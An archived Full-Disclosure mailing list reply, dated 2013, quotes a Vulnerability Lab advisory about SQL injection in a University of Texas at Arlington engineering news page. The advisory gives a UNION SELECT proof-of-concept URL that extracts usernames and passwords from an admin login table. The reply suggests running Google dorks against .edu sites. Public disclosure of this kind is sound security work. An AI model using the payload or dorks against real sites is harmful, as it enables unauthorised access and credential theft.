[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <CAPMrQTR1z=quibsWXwPWY+oNgB0OMNGOm=GPDCHRGSK3i8w7Xg@mail.gmail.com>
Date: Thu, 29 Aug 2013 22:04:21 +0300
From: Julius Kivimäki <julius.kivimaki@...il.com>
To: Vulnerability Lab <research@...nerability-lab.com>
Cc: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: Re: UTA EDU University ENG - SQL Injection
Vulnerability
If you're going to start posting this shit. I suggest you visit
http://www.exploit-db.com/google-dorks/ and try appending site:edu to all
of them.
2013/8/29 Vulnerability Lab <research@...nerability-lab.com>
> Title:
> ======
> UTA EDU University ENG - SQL Injection Vulnerability
>
>
> Date:
> =====
> 2013-08-28
>
>
> References:
> ===========
> http://www.vulnerability-lab.com/get_content.php?id=256
>
>
> VL-ID:
> =====
> 256
>
>
> Common Vulnerability Scoring System:
> ====================================
> 8.4
>
>
> Introduction:
> =============
> The University of Texas at Arlington´s College of Engineering provides one
> of the most comprehensive engineering programs in
> North Texas and the nation, with eight baccalaureate programs, 13 master`s
> and 9 doctorates. It is the fourth largest engineering
> college in Texas, with about 3,900 students.
>
> (Copy of the Homepage: http://www.uta.edu )
>
>
> Abstract:
> =========
> The Vulnerability Laboratory Research Team discovered a SQL Injection web
> vulnerability in the famous Arlington Engeneering University in Texas.
>
>
> Report-Timeline:
> ================
> 2011-12-26: Researcher Notification & Coordination (Chokri Ben Achour)
> 2012-11-27: Vendor Notification (Support Team)
> 2012-**-**: Vendor Response/Feedback (Support Team)
> 2013-08-22: Vendor Fix/Patch (No Response, verify by Check]
> 2013-08-28: Public Disclosure (Vulnerability Laboratory)
>
>
>
> Status:
> ========
> Published
>
>
> Exploitation-Technique:
> =======================
> Remote
>
>
> Severity:
> =========
> Critical
>
>
> Details:
> ========
> A critical SQL Injection web vulnerability is detected in the famous
> Arlington Engeneering University in Texas.
> The vulnerability allows remote attackers to inject or execute own sql
> commands to compromise the web-application or web-server dbms.
>
> The vulnerability is located in the engineeringnews module when processing
> to request ID parameter with own SQL commands.
> Remote attackers are able to inject the commands to compromise the
> web-application and affected database management system.
> The flaw is result of the wrong validation of the id value when processing
> to load the engineeringnews.php file.
>
>
> Vulnerable Module(s):
> [+]
> ../engineeringnews/
>
> Vulnerable File(s):
> [+]
> engineeringnews.php
>
> Vulnerable Parameter(s):
> [+] id
>
>
> Proof of Concept:
> =================
> The remote sql injection vulnerability can be exploited by remote
> attackers without user interaction or privileged user account.
> For demonstration or reproduce ...
>
> PoC:
> http://www.uta.edu/engineering/engineeringnews/engineeringnews.php?id=
>
> -1337+union+select+1,2,3,concat_ws(0x3a3a,id,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+adlogin+limit+0,1--
>
>
> Solution:
> =========
> 2013-08-22: Vendor Fix/Patch (No Response, verify by Check]
>
>
> Risk:
> =====
> The security risk of the remote sql injection web vulnerability is
> estimated as critical.
>
>
> Credits:
> ========
> Vulnerability Laboratory [Research Team] - Chokri Ben Achour (
> chokri@...lution-sec.com)
>
>
> Disclaimer:
> ===========
> The information provided in this advisory is provided as it is without any
> warranty. Vulnerability Lab disclaims all warranties,
> either expressed or implied, including the warranties of merchantability
> and capability for a particular purpose. Vulnerability-
> Lab or its suppliers are not liable in any case of damage, including
> direct, indirect, incidental, consequential loss of business
> profits or special damages, even if Vulnerability-Lab or its suppliers
> have been advised of the possibility of such damages. Some
> states do not allow the exclusion or limitation of liability for
> consequential or incidental damages so the foregoing limitation
> may not apply. We do not approve or encourage anybody to break any vendor
> licenses, policies, deface websites, hack into databases
> or trade with fraud/stolen material.
>
> Domains: www.vulnerability-lab.com - www.vuln-lab.com
> - www.evolution-sec.com
> Contact: admin@...nerability-lab.com -
> research@...nerability-lab.com - admin@...lution-sec.com
> Section: www.vulnerability-lab.com/dev -
> forum.vulnerability-db.com -
> magazine.vulnerability-db.com
> Social: twitter.com/#!/vuln_lab -
> facebook.com/VulnerabilityLab -
> youtube.com/user/vulnerability0lab
> Feeds: vulnerability-lab.com/rss/rss.php -
> vulnerability-lab.com/rss/rss_upcoming.php -
> vulnerability-lab.com/rss/rss_news.php
>
> Any modified copy or reproduction, including partially usages, of this
> file requires authorization from Vulnerability Laboratory.
> Permission to electronically redistribute this alert in its unmodified
> form is granted. All other rights, including the use of other
> media, are reserved by Vulnerability-Lab Research Team or its suppliers.
> All pictures, texts, advisories, source code, videos and
> other information on this website is trademark of vulnerability-lab team &
> the specific authors or managers. To record, list (feed),
> modify, use or edit our material contact (admin@...nerability-lab.com or
> research@...nerability-lab.com) to get a permission.
>
> Copyright © 2013 | Vulnerability
> Laboratory [Evolution Security]
>
>
>
>
>
>
>
> --
> VULNERABILITY LABORATORY RESEARCH TEAM
> DOMAIN: www.vulnerability-lab.com
> CONTACT: research@...nerability-lab.com
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists